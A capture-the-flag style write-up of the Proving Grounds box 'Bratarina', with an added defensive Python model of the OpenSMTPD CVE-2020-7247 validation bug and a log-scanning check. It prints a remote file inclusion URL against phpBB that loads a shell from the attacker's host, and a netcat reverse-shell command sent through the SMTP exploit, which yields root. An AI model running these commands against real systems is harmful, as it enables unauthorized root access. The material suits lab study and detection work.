Bratarina

Source: Proving Grounds
OS: Linux
Community Rating: Intermediate

Enumeration & Reconnaissance

  • Autorecon revealed open ports:

    • SSH (22)

    • SMTP (25)

    • HTTP (80)

    • SMB (445)

Service Analysis

  • The HTTP site immediately stood out, but it was painfully slow—like click-and-wait-forever slow. I thought the machine was glitching, so I reverted it and restarted, but nothing changed. Maybe it was designed to be this way?

  • Found CVE-2007-3697, an RFI vulnerability in phpBB's sendmsg.php, reachable through the phpbb_root_path parameter:

    http://192.168.111.71/phpbb/sendmsg.php?phpbb_root_path=http://192.168.45.157/shell.php
    [Screenshot: HTTP Being Slow]

  • Tried repeatedly, but the site's sluggishness made exploitation impractical; it's probably a rabbit hole.

Gaining Initial Access

  • Frustrated, I shifted to SMTP. Nmap identified OpenSMTPD, and a quick CVE search revealed CVE-2020-7247, an RCE flaw.

[Screenshot: OpenSMTPD]
  • I ran the exploit script with random commands. No response. Tried again with a different command, still nothing. On the third attempt, I tweaked the payload to get a shell back, and suddenly, my netcat listener lit up. A shell connected!

    python cve.py 192.168.111.71 25 "busybox nc 192.168.45.157 22 -e sh"
    [Screenshot: Getting a Shell]
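To make the "RCE flaw" concrete, here is an added example written for this page; it is not code from the writeup, from the exploit script it ran, or from OpenSMTPD itself. It paraphrases the sender-address validation of smtp_mailaddr() in OpenSMTPD's smtp_session.c in its vulnerable and fixed forms, shows why a sender such as `;sleep 66;` passes the former and fails the latter, adds a version check against the range given in the public advisory (6.4.0 up to but not including 6.6.2, treated here as an assumption to verify), and scans constructed log lines for senders that only the buggy path could have accepted. The character tables, the 64-byte local-part limit and the log line format are simplified assumptions, not upstream code.

```python
"""CVE-2020-7247: why OpenSMTPD 6.4.0-6.6.1 accepts ';sleep 66;' as a sender.

Added example for this writeup; not code from the page, from the exploit
script it used, or from OpenSMTPD.  The two smtp_mailaddr() variants paraphrase
the branch order of smtp_mailaddr() in OpenSMTPD's smtp_session.c before and
after the fix; the character tables and the 64-byte local-part limit are
simplified approximations of the upstream checks.  Log lines are constructed.
"""
import re
import string

# RFC 5321 atext plus '.', roughly what OpenSMTPD's valid_localpart() allows.
# Note ';' and ' ' are absent: a correct validator never lets them through.
ATEXT = set(string.ascii_letters + string.digits + "!#$%&'*+-/=?^_`{|}~.")
LABEL_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?$")
MAX_LOCALPART = 64  # assumed SMTPD_MAXLOCALPARTSIZE; bounds any injected command


def valid_localpart(user):
    return 0 < len(user) <= MAX_LOCALPART and all(c in ATEXT for c in user)


def valid_domainpart(domain):
    return bool(domain) and all(LABEL_RE.match(l) for l in domain.split("."))


def split_mailaddr(text):
    """Mimic text_to_mailaddr(): 'user@domain', or a bare 'user' with no domain."""
    user, _, domain = text.partition("@")
    return user, domain


def smtp_mailaddr_vulnerable(text, mailfrom, local_domain):
    """Vulnerable branch order. Returns (accepted, user, domain)."""
    user, domain = split_mailaddr(text)
    if valid_localpart(user) and valid_domainpart(domain):
        return True, user, domain
    # Fallback path for addresses that failed validation:
    if mailfrom and user == "" and domain == "":   # empty return-path (bounces)
        return True, user, domain
    if user == "":                                 # no local part: reject
        return False, user, domain
    if domain == "":
        # BUG: the local part is assumed fine and only the domain is defaulted,
        # so ';sleep 66;' is accepted and later reaches the mbox delivery
        # command, which OpenSMTPD runs through /bin/sh -c as root.
        return True, user, local_domain
    return False, user, domain


def smtp_mailaddr_fixed(text, mailfrom, local_domain):
    """Same structure, with the local part re-checked before defaulting the domain."""
    user, domain = split_mailaddr(text)
    if valid_localpart(user) and valid_domainpart(domain):
        return True, user, domain
    if mailfrom and user == "" and domain == "":
        return True, user, domain
    if user == "":
        return False, user, domain
    if domain == "":
        return valid_localpart(user), user, local_domain
    return False, user, domain


def version_is_vulnerable(version):
    """True for OpenSMTPD releases in the assumed affected range [6.4.0, 6.6.2)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(p\d+)?", version.strip())
    if not m:
        return None
    ver = tuple(int(x) for x in m.groups()[:3])
    return (6, 4, 0) <= ver < (6, 6, 2)


SENDER_RE = re.compile(r"(?:MAIL FROM:|from=)<([^>]*)>", re.IGNORECASE)

# Constructed sample lines in the shape of OpenSMTPD 'smtp message' log entries.
SAMPLE_LOG = [
    "smtpd[1412]: 2a1f smtp message msgid=6c0e from=<root@bratarina> to=<root@bratarina> size=412",
    "smtpd[1412]: 2a20 smtp message msgid=6c0f from=<;sleep 66;> to=<root@bratarina> size=388",
]


def suspicious_senders(log_lines):
    """Flag envelope senders a correct validator would have rejected.

    Any local part containing characters outside ATEXT (or longer than the
    limit) could only have been accepted by the vulnerable fallback path.
    """
    hits = []
    for line in log_lines:
        m = SENDER_RE.search(line)
        if not m:
            continue
        user, _ = split_mailaddr(m.group(1))
        if user and not valid_localpart(user):
            hits.append((user, line))
    return hits


if __name__ == "__main__":
    print("vulnerable:", smtp_mailaddr_vulnerable(";sleep 66;", True, "bratarina"))
    print("fixed:     ", smtp_mailaddr_fixed(";sleep 66;", True, "bratarina"))
    for user, line in suspicious_senders(SAMPLE_LOG):
        print("suspicious sender", repr(user), "in:", line)
```

The 64-byte local-part limit is why public payloads keep the MAIL FROM value short and put the real command elsewhere; the log scan is the cheap retrospective check for a box that ran an affected version, since a sender with `;` or a space in its local part cannot have come through a correct validator.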

Privilege Escalation

  • Not required; the initial shell already ran as root. The injected command executes inside OpenSMTPD's local mailbox delivery step, which runs as root, so exploiting CVE-2020-7247 lands directly in a root shell.

Lessons Learned

  • Persistence Pays: Multiple exploit attempts may be needed, even with valid CVEs.

  • SMTP Overlooked: Don’t tunnel-vision on HTTP, check all services for vulnerabilities.

  • Slow Sites Might be Red Flags: Sluggish responses might hint at misconfigurations or intentional hurdles.
